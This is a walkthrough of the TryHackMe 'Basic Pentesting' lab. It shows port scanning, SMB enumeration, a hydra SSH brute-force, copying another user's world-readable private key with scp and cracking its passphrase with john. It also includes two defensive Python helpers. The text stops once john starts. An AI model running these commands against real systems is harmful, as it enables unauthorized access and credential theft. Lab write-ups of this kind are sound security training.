[Try Hack Me] Basic Pentesting
Find the services exposed by the machine
Scan the ports with nmap.
Version detection (-sV), all 65535 ports (-p-), and --min-rate to keep the scan at or above the given number of packets per second, which speeds it up. One caveat visible in the output below: the "retransmission cap hit" warning and the 4582 ports reported as filtered (no-response) mean probes were being dropped at 5000 packets/s over a roughly 250 ms VPN link, so a real port can be missed this way. When completeness matters, re-scan the filtered ports at a lower rate.
nmap -sV -p- --min-rate 5000 10.10.75.0
┌──(kali㉿kali)-[~]
└─$ nmap -sV -p- --min-rate 5000 10.10.75.0
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-21 23:07 JST
Warning: 10.10.75.0 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.75.0
Host is up (0.25s latency).
Not shown: 60947 closed tcp ports (conn-refused), 4582 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.88 seconds
What is the name of the hidden directory on the web server(enter name without /)?
I prefer not to use a GUI, so I use dirsearch instead of DirBuster.
Install it as described in the project's instructions.
The nmap result shows Apache running on port 80.
Enumerate directories with the following.
python3 dirsearch.py -u http://10.10.75.0
┌──(root㉿kali)-[/home/kali/dirsearch]
└─# python3 dirsearch.py -u http://10.10.75.0
/home/kali/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11715
Output: /home/kali/dirsearch/reports/http_10.10.75.0/_23-11-21_23-31-00.txt
Target: http://10.10.75.0/
[23:31:00] Starting:
[23:31:19] 403 - 296B - /.ht_wsr.txt
[23:31:20] 403 - 299B - /.htaccess.bak1
[23:31:20] 403 - 299B - /.htaccess.orig
[23:31:20] 403 - 301B - /.htaccess.sample
[23:31:20] 403 - 299B - /.htaccess.save
[23:31:20] 403 - 300B - /.htaccess_extra
[23:31:20] 403 - 297B - /.htaccess_sc
[23:31:20] 403 - 297B - /.htaccessOLD
[23:31:20] 403 - 299B - /.htaccess_orig
[23:31:20] 403 - 297B - /.htaccessBAK
[23:31:20] 403 - 298B - /.htaccessOLD2
[23:31:20] 403 - 289B - /.htm
[23:31:20] 403 - 290B - /.html
[23:31:20] 403 - 299B - /.htpasswd_test
[23:31:20] 403 - 296B - /.httr-oauth
[23:31:20] 403 - 295B - /.htpasswds
[23:33:46] 200 - 1KB - /■■■■■■/
[23:35:52] 403 - 298B - /server-status
[23:35:52] 403 - 299B - /server-status/
Task Completed
The directory that came back with 200 is the answer here (hidden). The 403 responses for the .ht* names and /server-status are Apache's default deny rules for those paths, not findings.
What is the username?
Since the SMB ports (139/445) are open, use enum4linux to look at share and user information.
enum4linux 10.10.109.151 -a
┌──(root㉿kali)-[/home/kali/dirsearch]
└─# enum4linux 10.10.109.151 -a
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Nov 23 01:50:38 2023
=========================================( Target Information )=========================================
Target ........... 10.10.109.151
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 10.10.109.151 )===========================
[+] Got domain/workgroup name: WORKGROUP
===============================( Nbtstat Information for 10.10.109.151 )===============================
Looking up status of 10.10.109.151
BASIC2 <00> - B <ACTIVE> Workstation Service
BASIC2 <03> - B <ACTIVE> Messenger Service
BASIC2 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
===================================( Session Check on 10.10.109.151 )===================================
[+] Server 10.10.109.151 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.109.151 )================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 10.10.109.151 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.109.151 from srvinfo:
BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
platform_id : 500
os version : 6.1
server type : 0x809a03
=======================================( Users on 10.10.109.151 )=======================================
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
=================================( Share Enumeration on 10.10.109.151 )=================================
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP BASIC2
[+] Attempting to map shares on 10.10.109.151
//10.10.109.151/Anonymous Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//10.10.109.151/IPC$ Mapping: N/A Listing: N/A Writing: N/A
===========================( Password Policy Information for 10.10.109.151 )===========================
[+] Attaching to 10.10.109.151 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] BASIC2
[+] Builtin
[+] Password Info for Domain: BASIC2
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
======================================( Groups on 10.10.109.151 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==================( Users on 10.10.109.151 via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)
===============================( Getting printer info for 10.10.109.151 )===============================
No printers returned.
enum4linux complete on Thu Nov 23 02:09:29 2023
This shows two Unix users, kay (UID 1000) and jan (UID 1001): S-1-22-1 is the SID prefix Samba uses for local Unix accounts, and the RID is the UID. Note that enum4linux only cycled RIDs 500-550 and 1000-1050 here (its default), so an account with a higher UID would be missed unless the range is widened with -R.
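As an added example (not part of the original writeup, and not enum4linux's own code), here is a small Python parser for the RID-cycling section of the output above. It classifies each SID by its prefix, so that real Unix accounts (Samba's S-1-22-1) are separated from the BUILTIN aliases and the machine-local domain, and returns the logins worth trying next in UID order. The input is a constructed excerpt in the same shape as the output above, not a live capture.

```python
import re
from collections import defaultdict

# Constructed excerpt in the shape of the enum4linux RID-cycling output above
# (trimmed to a few lines); it is sample input, not a live capture.
SAMPLE_OUTPUT = """\
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\\kay (Local User)
S-1-22-1-1001 Unix User\\jan (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\\Administrators (Local Group)
S-1-5-32-545 BUILTIN\\Users (Local Group)
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\\None (Domain Group)
"""

# One account line: <SID prefix>-<RID> <DOMAIN>\<NAME> (<kind>)
ACCOUNT_RE = re.compile(
    r"^(?P<prefix>S-1-[\d-]+?)-(?P<rid>\d+)\s+"
    r"(?P<domain>[^\\]+)\\(?P<name>.+?)\s+"
    r"\((?P<kind>Local User|Local Group|Domain User|Domain Group)\)\s*$",
    re.MULTILINE,
)


def sid_family(prefix: str) -> str:
    """Map a SID prefix to what Samba uses it for."""
    if prefix == "S-1-22-1":
        return "unix-user"      # local /etc/passwd users exposed by Samba; RID == UID
    if prefix == "S-1-22-2":
        return "unix-group"     # local /etc/group groups; RID == GID
    if prefix == "S-1-5-32":
        return "builtin"        # Windows BUILTIN aliases, present on every Samba host
    if prefix.startswith("S-1-5-21-"):
        return "machine-local"  # the host's own domain SID (nobody, None, ...)
    return "other"


def parse_accounts(text: str) -> list:
    """Turn each 'SID  DOMAIN\\name (kind)' line into a record."""
    accounts = []
    for m in ACCOUNT_RE.finditer(text):
        accounts.append({
            "sid": f"{m['prefix']}-{m['rid']}",
            "rid": int(m["rid"]),
            "family": sid_family(m["prefix"]),
            "domain": m["domain"],
            "name": m["name"],
            "kind": m["kind"],
        })
    return accounts


def candidate_logins(text: str) -> list:
    """Unix users found by RID cycling, in UID order: the accounts that can
    actually log in over SSH, unlike BUILTIN groups or the 'nobody' account."""
    users = [a for a in parse_accounts(text)
             if a["family"] == "unix-user" and a["kind"] == "Local User"]
    return [a["name"] for a in sorted(users, key=lambda a: a["rid"])]


def summarize(text: str) -> dict:
    """Count of accounts per SID family, to see at a glance what was enumerated."""
    counts = defaultdict(int)
    for a in parse_accounts(text):
        counts[a["family"]] += 1
    return dict(counts)


if __name__ == "__main__":
    for acct in parse_accounts(SAMPLE_OUTPUT):
        print(f"{acct['family']:<14} rid={acct['rid']:<5} "
              f"{acct['domain']}\\{acct['name']} ({acct['kind']})")
    print("logins to try:", candidate_logins(SAMPLE_OUTPUT))
```

Run it on a saved enum4linux report (`parse_accounts(open("enum.txt").read())`) to get the same split; the UIDs it reports also tell you whether the default RID range of 500-550,1000-1050 stopped short of other accounts.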
The Anonymous share looks readable without a password, so try it with smbclient.
smbclient //10.10.109.151/Anonymous -U Anonymous
┌──(root㉿kali)-[/home/kali/dirsearch]
└─# smbclient //10.10.109.151/Anonymous -U Anonymous
Password for [WORKGROUP\Anonymous]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Apr 20 02:31:20 2018
.. D 0 Fri Apr 20 02:13:06 2018
staff.txt N 173 Fri Apr 20 02:29:55 2018
14318640 blocks of size 1024. 10822632 blocks available
smb: \>
View staff.txt with smbclient's more command.
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
What is the password?
Since SSH is open, assume one of the usernames found above is valid and brute-force it with hydra, starting with jan, the user called out in staff.txt. Hydra itself warns that SSH servers limit parallel connections; the "Connection reset by peer" errors in the output below are sshd dropping excess unauthenticated connections (its MaxStartups limit), so running with -t 4 as hydra suggests wastes far fewer attempts. rockyou.txt is in the working directory here; on Kali it normally lives under /usr/share/wordlists/.
hydra -l jan -P rockyou.txt 10.10.109.151 ssh -v
┌──(kali㉿kali)-[~]
└─$ hydra -l jan -P rockyou.txt 10.10.109.151 ssh -v
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-11-23 03:25:11
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.109.151:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://jan@10.10.109.151:22
[INFO] Successful, password authentication is supported by ssh://10.10.109.151:22
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Disabled child 10 because of too many errors
[STATUS] 163.00 tries/min, 163 tries in 00:01h, 14344236 to do in 1466:42h, 15 active
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 2
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 12
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 12
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 5
[STATUS] 105.33 tries/min, 316 tries in 00:03h, 14344083 to do in 2269:39h, 15 active
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 5
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 5
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 5
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 3
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 12
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 12
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 1
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 12
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 1
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 1
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 6
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 6
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 6
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 2
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 6
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 2
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 2
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 6
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 6
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 5
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 1
[STATUS] 105.86 tries/min, 741 tries in 00:07h, 14343658 to do in 2258:21h, 15 active
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 6
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 2
[22][ssh] host: 10.10.109.151 login: jan password: ■■■■■
[STATUS] attack finished for 10.10.109.151 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-11-23 03:33:06
What is the name of the other user you found(all lower case)?
Logging in over SSH with the password obtained for jan succeeded.
/home contains two home directories, jan and kay.
Looking in kay's home, there is an SSH key pair under .ssh. Both the .ssh directory (755) and id_rsa (644) are readable by everyone, so jan can read kay's private key; the following questions require it.
┌──(kali㉿kali)-[~]
└─$ ssh jan@10.10.159.67
The authenticity of host '10.10.159.67 (10.10.159.67)' can't be established.
ED25519 key fingerprint is SHA256:XKjDkLKocbzjCch0Tpriw1PeLPuzDufTGZa4xMDA+o4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.159.67' (ED25519) to the list of known hosts.
jan@10.10.159.67's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102
jan@basic2:~$ ls
jan@basic2:~$ pwd
/home/jan
jan@basic2:~$ cd ..
jan@basic2:/home$ ls
jan kay
jan@basic2:/home$ cd kay/
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
jan@basic2:/home/kay$ cd .ssh/
jan@basic2:/home/kay/.ssh$ ls -al
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 ..
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
jan@basic2:/home/kay/.ssh$
Enumerate the machine to find any vectors for privilege escalation
Enumerate with LinPEAS.
Download it with wget and serve it from a local HTTP server.
┌──(kali㉿kali)-[~]
└─$ wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
--2023-11-23 13:36:54-- https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
Resolving github.com (github.com)... 20.27.177.113
Connecting to github.com (github.com)|20.27.177.113|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://github.com/carlospolop/PEASS-ng/releases/download/20231119-295ce4ea/linpeas.sh [following]
--2023-11-23 13:36:54-- https://github.com/carlospolop/PEASS-ng/releases/download/20231119-295ce4ea/linpeas.sh
Reusing existing connection to github.com:443.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/2bafa7e6-e114-4e70-880e-abea7589537d?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20231123%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231123T043727Z&X-Amz-Expires=300&X-Amz-Signature=1bff049a2bff176fb32fca404a293b59c7aa2db9efe8987b00f9f92512b0d650&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [following]
--2023-11-23 13:36:54-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/2bafa7e6-e114-4e70-880e-abea7589537d?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20231123%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231123T043727Z&X-Amz-Expires=300&X-Amz-Signature=1bff049a2bff176fb32fca404a293b59c7aa2db9efe8987b00f9f92512b0d650&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.109.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847815 (828K) [application/octet-stream]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[=============================>] 827.94K --.-KB/s in 0.09s
2023-11-23 13:36:55 (9.21 MB/s) - ‘linpeas.sh’ saved [847815/847815]
┌──(kali㉿kali)-[~]
└─$ python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
SSH in as jan and fetch the LinPEAS shell script from that HTTP server with wget.
jan has no write permission on the home directory, so write it to /tmp instead.
jan@basic2:~$ wget http://10.8.120.61:8080/linpeas.sh
--2023-11-22 23:40:24-- http://10.8.120.61:8080/linpeas.sh
Connecting to 10.8.120.61:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847815 (828K) [text/x-sh]
linpeas.sh: Permission denied
Cannot write to ‘linpeas.sh’ (Success).
jan@basic2:~$ cd /tmp/
jan@basic2:/tmp$ wget http://10.8.120.61:8080/linpeas.sh
--2023-11-22 23:41:31-- http://10.8.120.61:8080/linpeas.sh
Connecting to 10.8.120.61:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847815 (828K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[=============================>] 827.94K 451KB/s in 1.8s
2023-11-22 23:41:34 (451 KB/s) - ‘linpeas.sh’ saved [847815/847815]
jan@basic2:/tmp$
sh linpeas.sh
starts enumerating the target (the file has no execute bit after wget, so run it through sh).
Excerpts from the output: it picks up the local users and the SSH-related files, including kay's world-readable private key. /home/kay/.sudo_as_admin_successful is also worth noting: Ubuntu creates it the first time a member of the admin/sudo group runs sudo successfully, so kay likely has sudo rights.
...
╔══════════╣ Users with console
jan:x:1001:1001::/home/jan:/bin/bash
kay:x:1000:1000:Kay,,,:/home/kay:/bin/bash
root:x:0:0:root:/root:/bin/bash
...
╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 /home/kay/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
...
══╣ Possible private SSH keys were found!
/home/kay/.ssh/id_rsa
...
╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Aug 31 2015 /etc/skel/.bashrc
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 /home/kay/.bashrc
-rw------- 1 root jan 47 Apr 23 2018 /home/jan/.lesshst
-rw------- 1 root kay 119 Apr 23 2018 /home/kay/.lesshst
-rw-r--r-- 1 root root 655 May 16 2017 /etc/skel/.profile
-rw-r--r-- 1 kay kay 655 Apr 17 2018 /home/kay/.profile
-rw-r--r-- 1 kay kay 0 Apr 17 2018 /home/kay/.sudo_as_admin_successful
...
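The finding that matters here is not the key itself but its mode: /home/kay/.ssh is 755 and id_rsa is 644, so any local user can copy it. The Python below, an added example rather than anything from LinPEAS or the writeup, is the defender-side version of that check: walk a home directory tree, identify private keys by their PEM header regardless of file name, and report those readable by group/others or stored in a directory that others can traverse. It runs against a constructed temporary tree mirroring the listing above; the file names, modes and contents are made up and contain no real key material.

```python
import os
import stat
import tempfile
from pathlib import Path

# PEM markers that identify a private key regardless of file name
PRIVATE_KEY_MARKERS = (
    b"-----BEGIN RSA PRIVATE KEY-----",
    b"-----BEGIN DSA PRIVATE KEY-----",
    b"-----BEGIN EC PRIVATE KEY-----",
    b"-----BEGIN OPENSSH PRIVATE KEY-----",
    b"-----BEGIN PRIVATE KEY-----",
    b"-----BEGIN ENCRYPTED PRIVATE KEY-----",
)


def looks_like_private_key(path: str) -> bool:
    """True if the file starts with a private-key PEM header."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(64)
    except OSError:  # unreadable by us: nothing to report from this vantage point
        return False
    return any(head.startswith(marker) for marker in PRIVATE_KEY_MARKERS)


def exposed_private_keys(home_root: str) -> list:
    """Walk the home directories under home_root and report private keys that a
    different local user could read: key file readable by group/others (mode & 044)
    or key sitting in a directory others can traverse (mode & 011).
    Returns sorted [(relative path, octal mode, [problems])] for offending keys only."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(home_root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            # skip symlinks and specials; only regular files are candidate keys
            if not stat.S_ISREG(st.st_mode) or not looks_like_private_key(path):
                continue
            problems = []
            if st.st_mode & 0o044:
                problems.append("key readable by group/others")
            if os.stat(dirpath).st_mode & 0o011:
                problems.append("parent directory traversable by group/others")
            if problems:
                findings.append((os.path.relpath(path, home_root),
                                 oct(stat.S_IMODE(st.st_mode)), problems))
    return sorted(findings)


def build_demo_homes() -> str:
    """Constructed /home look-alike mirroring the listing above: kay's key is
    world-readable inside a 755 .ssh, jan's is locked down. Not real key material."""
    root = tempfile.mkdtemp(prefix="homes-")

    def put(rel, data, mode):
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(data)
        p.chmod(mode)

    put("kay/.ssh/id_rsa", b"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n", 0o644)
    put("kay/.ssh/id_rsa.pub", b"ssh-rsa AAAAB3 kay@basic2\n", 0o644)   # public half: fine
    put("kay/pass.bak", b"not a key\n", 0o600)                          # not a key: ignored here
    put("jan/.ssh/id_ed25519", b"-----BEGIN OPENSSH PRIVATE KEY-----\n", 0o600)
    os.chmod(Path(root, "kay/.ssh"), 0o755)
    os.chmod(Path(root, "jan/.ssh"), 0o700)
    return root


if __name__ == "__main__":
    for rel, mode, problems in exposed_private_keys(build_demo_homes()):
        print(f"{rel} ({mode}): " + "; ".join(problems))
```

Run as root with `exposed_private_keys("/home")` to audit a real host; the fix for each hit is `chmod 700 ~/.ssh` and `chmod 600` on the key, which is also what ssh itself insists on before it will use a key.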
What is the final password you obtain?
Download the private key found in kay's home directory with scp.
┌──(kali㉿kali)-[~]
└─$ scp jan@10.10.96.211:/home/kay/.ssh/id_rsa ~
jan@10.10.96.211's password:
id_rsa 100% 3326 5.7KB/s 00:00
Crack the id_rsa passphrase with John the Ripper.
First, ssh2john.py converts id_rsa into a hash format that john understands.
Then run john against it with a wordlist. In the output below, "Cost 1 (KDF/cipher ...) is 0" means the key is in the legacy PEM format (OpenSSL's MD5-based EVP_BytesToKey with AES) and "Cost 2 (iteration count) is 1" means a single round, which is why john gets through over a million candidates per second here; a key saved in the newer OpenSSH format with bcrypt would crack orders of magnitude slower.
python /usr/share/john/ssh2john.py id_rsa > id_rsa.txt
john --wordlist=rockyou.txt id_rsa.txt
┌──(kali㉿kali)-[~]
└─$ python /usr/share/john/ssh2john.py id_rsa > id_rsa.txt
┌──(kali㉿kali)-[~]
└─$ john --wordlist=rockyou.txt id_rsa.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
